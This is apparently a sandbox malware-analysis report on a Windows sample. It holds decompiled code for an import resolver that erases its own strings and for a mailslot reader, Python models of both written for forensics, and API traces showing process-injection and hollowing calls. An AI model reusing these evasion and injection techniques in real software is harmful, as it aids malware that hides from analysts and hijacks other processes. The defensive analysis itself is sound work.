				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

Instruction address range: 0x00401389 to 0x00401483

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
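Analyst's note, added to this report (example code, not Joe Sandbox output and not the sample's own code). The decompiled E00401389 above reads the field at +0x80 of the structure passed in _a4, steps through records 0x14 bytes apart using the fields at +0x0, +0xc and +0x10, calls LoadLibraryA on the string at +0xc and GetProcAddress on each table entry + 2, and wipes every string with memset once it has been used. Read against IMAGE_NT_HEADERS32, +0x80 is the import directory RVA, +0x50 is SizeOfImage, 0x14 is sizeof(IMAGE_IMPORT_DESCRIPTOR), +0x0/+0xc/+0x10 are OriginalFirstThunk/Name/FirstThunk, and the +2 skips IMAGE_IMPORT_BY_NAME.Hint, so this is a hand-rolled import resolver for a module mapped at __edi, with return values 0x7e (ERROR_MOD_NOT_FOUND) and 0x7f (ERROR_PROC_NOT_FOUND). The Python model below re-implements that walk over a constructed toy image, with a dictionary standing in for LoadLibraryA/GetProcAddress. The names build_image, resolve_imports and resolved_iat and all export addresses are the example's own; and because the decompile's ordinal branch is garbled (it range-checks the thunk against SizeOfImage and then passes a constant to GetProcAddress), ordinal thunks are resolved the documented way, by their low 16 bits, which is an assumption rather than something the decompile shows.

```python
import struct

# Header offsets the decompiled E00401389 dereferences, read as IMAGE_NT_HEADERS32 fields
NT_SIZE_OF_IMAGE = 0x50      # OptionalHeader.SizeOfImage (bound check in the ordinal branch)
NT_IMPORT_DIR_RVA = 0x80     # DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress
DESC_SIZE = 0x14             # sizeof(IMAGE_IMPORT_DESCRIPTOR), the "_t34 + 0x14" step
ORDINAL_FLAG = 0x80000000    # IMAGE_ORDINAL_FLAG32, tested as a sign bit ("_t57 < 0")
ERROR_MOD_NOT_FOUND = 0x7E   # returned when LoadLibraryA fails
ERROR_PROC_NOT_FOUND = 0x7F  # returned when GetProcAddress fails

def u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]

def put32(buf, off, val):
    struct.pack_into("<I", buf, off, val)

def cstr(buf, off):
    return bytes(buf[off:buf.index(b"\0", off)])

def wipe(buf, off):
    """memset(s, 0, lstrlenA(s)): the sample erases each name right after using it."""
    end = buf.index(b"\0", off)
    buf[off:end] = bytes(end - off)

def resolve_imports(image, nt_hdr, exports):
    """Model of E00401389. image: the mapped module (index == RVA, i.e. __edi == 0);
    nt_hdr: offset of IMAGE_NT_HEADERS32 (_a4); exports: {dll: {name_or_ordinal: addr}}
    standing in for LoadLibraryA/GetProcAddress. Returns 0 or a Win32 error code."""
    result = 0
    desc = u32(image, nt_hdr + NT_IMPORT_DIR_RVA)
    if desc == 0:
        return result
    while True:
        name_rva = u32(image, desc + 0x0C)          # IMAGE_IMPORT_DESCRIPTOR.Name
        if name_rva == 0:                           # all-zero descriptor ends the table
            return result
        module = exports.get(cstr(image, name_rva).decode().lower())
        if module is None:
            return ERROR_MOD_NOT_FOUND              # LoadLibraryA failed: stop at once
        wipe(image, name_rva)                       # DLL name zeroed as soon as it is loaded
        ilt, iat = u32(image, desc), u32(image, desc + 0x10)
        thunk = ilt or iat                          # no OriginalFirstThunk: walk the IAT itself
        if thunk:
            delta = iat - thunk                     # ILT entry -> matching IAT slot
            while (entry := u32(image, thunk)) != 0:
                by_name = not entry & ORDINAL_FLAG
                key = cstr(image, entry + 2).decode() if by_name else entry & 0xFFFF
                addr = module.get(key)
                if addr is None:
                    result = ERROR_PROC_NOT_FOUND   # remembered; rest of this DLL skipped,
                    break                           # but the next descriptor is still processed
                if by_name:
                    wipe(image, entry + 2)          # function name zeroed too
                put32(image, thunk + delta, addr)   # patch the IAT slot
                thunk += 4
        desc += DESC_SIZE

FAKE_EXPORTS = {   # constructed stand-ins for GetProcAddress results; not real addresses
    "kernel32.dll": {"CreateFileA": 0x7C801A28, "WriteFile": 0x7C810E27, 12: 0x7C80B731},
    "advapi32.dll": {"OpenProcessToken": 0x77DD4D1E},
}

def build_image(dlls):
    """Constructed toy image: dlls = [(dll_name, [import, ...])], import is a str (by name)
    or an int (ordinal). NT headers at 0x100, descriptors at 0x200, thunk tables from
    0x400, strings from 0x600; the IAT starts out as a copy of the ILT (unresolved)."""
    image, nt_hdr, desc, thunks, strings = bytearray(0x1000), 0x100, 0x200, 0x400, 0x600
    put32(image, nt_hdr + NT_SIZE_OF_IMAGE, len(image))
    put32(image, nt_hdr + NT_IMPORT_DIR_RVA, desc)
    for dll, imports in dlls:
        image[strings:strings + len(dll)] = dll.encode()
        put32(image, desc + 0x0C, strings)
        strings += len(dll) + 1
        ilt = thunks
        iat = ilt + 4 * (len(imports) + 1)
        for i, imp in enumerate(imports):
            if isinstance(imp, int):
                val = ORDINAL_FLAG | imp
            else:                                   # IMAGE_IMPORT_BY_NAME: WORD Hint, then name
                image[strings + 2:strings + 2 + len(imp)] = imp.encode()
                val, strings = strings, strings + 2 + len(imp) + 1
            put32(image, ilt + 4 * i, val)
            put32(image, iat + 4 * i, val)
        put32(image, desc, ilt)
        put32(image, desc + 0x10, iat)
        thunks = iat + 4 * (len(imports) + 1)
        desc += DESC_SIZE
    return image, nt_hdr

def resolved_iat(image, nt_hdr, dll_index):
    """Return the IAT entries of the dll_index-th descriptor after resolution."""
    desc = u32(image, nt_hdr + NT_IMPORT_DIR_RVA) + dll_index * DESC_SIZE
    iat, out = u32(image, desc + 0x10), []
    while (v := u32(image, iat)) != 0:
        out.append(v)
        iat += 4
    return out

if __name__ == "__main__":
    img, nt = build_image([("KERNEL32.dll", ["CreateFileA", "WriteFile", 12]),
                           ("ADVAPI32.dll", ["OpenProcessToken"])])
    print(hex(resolve_imports(img, nt, FAKE_EXPORTS)), [hex(v) for v in resolved_iat(img, nt, 0)])
    print(b"CreateFileA" in img, b"KERNEL32" in img)   # both False once the names are wiped
```

The practical point for the memory dumps listed under "Memory Dump Source": after this routine has run, the DLL and function name strings inside the mapped module are zero bytes, so a post-execution dump of the image shows resolved addresses in the IAT but no import names; the API trace and the patched IAT values are what remain as evidence of which functions were resolved.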
Similarity
  • Total matches: 5
  • API ID: VirtualAllocVirtualFreelstrcpynmemcpy
  • String ID: Apr 14 2018$pnls$pnls
  • API String ID: 1980370899-1480254790
  • Opcode ID: d2d7eac804a3eb49e30a17e266a0af7cd79fc0f9b8674edd69bebf188f29996b
  • Instruction ID: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
  • Opcode Fuzzy Hash: 96F02D09194ED842E97E18906592B52B7063705617CADD526598378527AF5032138A6F
  • Instruction Fuzzy Hash: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
APIs
  • lstrcpyn.KERNEL32(002E1776,002E61FC,00000008,002E618C,0000000C,00000000,?,?,?,002E1776,?,?,002E7494), ref: 002E4031
  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,002E1776,?,?,002E7494), ref: 002E40A4
  • memcpy.NTDLL(?,00000000,?,?,002E7494,00000001,?,?,?,002E1776,?,?,002E7494), ref: 002E40ED
  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,002E7494,00000001,?,?,?,002E1776,?), ref: 002E4106
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

Instruction address range: 0x00401033 to 0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
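Analyst's note, added to this report (example code, not Joe Sandbox output and not the sample's own code). E00401033 above creates \\.\mailslot\msl0 with a 0x1000-byte maximum message size and a zero read timeout, then polls ReadFile, treating error 0x79 (ERROR_SEM_TIMEOUT, the slot is empty) as "Sleep(0x64) and try again", growing its heap buffer by 0x1000 per datagram received and stopping as soon as a datagram shorter than 0x1000 arrives. E004010FB, listed earlier in this report, is the other side; the API list for E00401639 shows both started as threads (00401034 and 004010FB). It retries CreateFileA on the slot while GetLastError() is 2 (the slot does not exist yet), writes the buffer returned by E0040171F in 0x1000-byte datagrams and, when that buffer's length is an exact multiple of 0x1000, sends the final byte again as a 1-byte datagram so the reader's short-read condition fires; afterwards it zeroes the buffer with memset and hands it to E00401207 (HeapFree). The Python below models that exchange with a queue standing in for the mailslot and a thread per side. The names Mailslot, sender, receiver and transfer, the shortened poll interval and the payloads are the example's own; WriteFile is modelled as never failing, so the sender's 0x79 retry path is not exercised. It also shows a consequence of the resend trick that the decompile does not make obvious: for payloads that are exact multiples of 0x1000 the receiver ends up with one duplicated trailing byte.

```python
import queue
import threading
import time

CHUNK = 0x1000              # CreateMailslotA max message size and the ReadFile/WriteFile length
ERROR_SEM_TIMEOUT = 0x79    # 121: ReadFile on an empty slot whose lReadTimeout is 0
POLL = 0.001                # stands in for Sleep(0x64); shortened so the demo runs quickly

class Mailslot:
    r"""Toy model of \\.\mailslot\msl0: each WriteFile is one datagram, ReadFile is non-blocking."""
    def __init__(self):
        self.msgs = queue.Queue()
        self.created = threading.Event()  # CreateMailslotA done; until then CreateFileA fails with 2

    def write(self, data):
        self.msgs.put(bytes(data))

    def read(self):
        try:
            return self.msgs.get_nowait(), 0
        except queue.Empty:
            return None, ERROR_SEM_TIMEOUT

def sender(slot, payload):
    """Model of E004010FB (the thread started at 004010FB). Returns the byte count wiped."""
    slot.created.wait()                       # CreateFileA retried every 100 ms while error == 2
    buf, off, remaining = bytearray(payload), 0, len(payload)
    while remaining:
        n = min(remaining, CHUNK)
        slot.write(buf[off:off + n])
        off, remaining = off + n, remaining - n
        if remaining == 0 and n == CHUNK:
            # exact multiple of CHUNK: resend the final byte as a 1-byte datagram so the
            # reader's "last read == 0x1000" loop condition fails and it stops waiting
            remaining, off = 1, off - 1
        time.sleep(POLL)
    buf[:] = bytes(len(buf))                  # memset(buf, 0, sent) before E00401207 frees it
    return off

def receiver(slot):
    """Model of E00401033 (the thread started at 00401034). Returns (status, assembled bytes)."""
    slot.created.set()                        # CreateMailslotA succeeded
    out, got = bytearray(), CHUNK
    while got == CHUNK:
        data, err = slot.read()
        if data is None:
            if err != ERROR_SEM_TIMEOUT:
                return err, bytes(out)        # any other ReadFile error aborts the transfer
            got = CHUNK                       # slot empty: _v16 = 0x1000, poll again
        else:
            out += data                       # HeapReAlloc by 0x1000, bytes appended
            got = len(data)
        time.sleep(POLL)
    return 0, bytes(out)

def transfer(payload):
    """Run both sides concurrently, as the two CreateThread calls in E00401639 do."""
    slot, result = Mailslot(), {}
    def rx():
        result["status"], result["data"] = receiver(slot)
    def tx():
        result["wiped"] = sender(slot, payload)
    threads = [threading.Thread(target=rx), threading.Thread(target=tx)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return result

if __name__ == "__main__":
    r = transfer(b"X" * 0x1FFF + b"Z")        # constructed 0x2000-byte payload
    print(r["status"], len(r["data"]), r["data"][-3:], r["wiped"])
```

Two details worth keeping in mind when reading the trace for this sample: the receiver's termination condition is a datagram shorter than 0x1000, not an end marker or a length field, which is why the sender needs the 1-byte resend; and a receiver that never sees a short datagram (for instance an empty payload, which writes nothing) would poll indefinitely with Sleep(0x64) between ReadFile calls, which is consistent with the many Sleep(00000064) entries in the API list.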
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
